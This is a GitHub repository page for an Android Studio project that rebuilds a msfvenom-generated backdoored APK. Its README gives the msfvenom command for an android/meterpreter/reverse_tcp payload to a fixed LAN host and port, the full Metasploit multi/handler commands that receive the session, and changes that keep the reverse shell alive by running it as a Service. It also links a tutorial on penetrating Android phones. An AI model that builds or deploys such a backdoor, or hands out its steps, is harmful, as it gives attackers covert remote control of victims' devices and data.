Skip to content
Android backdoored app, improved source code of msfvenom android .apk
Java
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
app automatically re-attempts to open a meterpreter session in a fixed ti… Feb 28, 2016
gradle/wrapper Initial commit Feb 23, 2016
.gitignore Initial commit Feb 23, 2016
MsfvenomBackdooredAPK.iml Initial commit Feb 23, 2016
README.md Update README.md Nov 5, 2016
build.gradle Initial commit Feb 23, 2016
gradle.properties Initial commit Feb 23, 2016
gradlew Initial commit Feb 23, 2016
gradlew.bat Initial commit Feb 23, 2016
settings.gradle Initial commit Feb 23, 2016

README.md

msfvenom-backdoor-android

This Android Studio project contains the source code of the backdoored .apk generated by

$msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk

(in Kali linux suite)

For an procedure guide of penetration into an Android system, please visit my website (Italian only) https://dragonitesec.wordpress.com/2016/11/06/tutorial-come-penetrare-in-un-telefono-android/

Tries to solve the issue:

[*]Meterpreter session x closed - Reason:died

message, by starting payload in a Service. Meterpreter session is more stable in this way (original msfvenom apk often causes session to die very soon)

In this project the backdoor works in LAN settings, opening a meterpreter session to 192.168.178.30 on port 4444 (this settings can be changed in Payload.java file if you want to work in a WAN) The control server must be executing handler exploit with Metasploit, with following commands:

$msfconsole
$use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST 192.168.178.30
$set LPORT 4444
$exploit

after the metasploit machine is waiting, the .apk can be installed and launched on the android terminal.

Remember to sign the .apk with a key before installing

Tested on Samsung Galaxy S6 - Lollipop

You can’t perform that action at this time.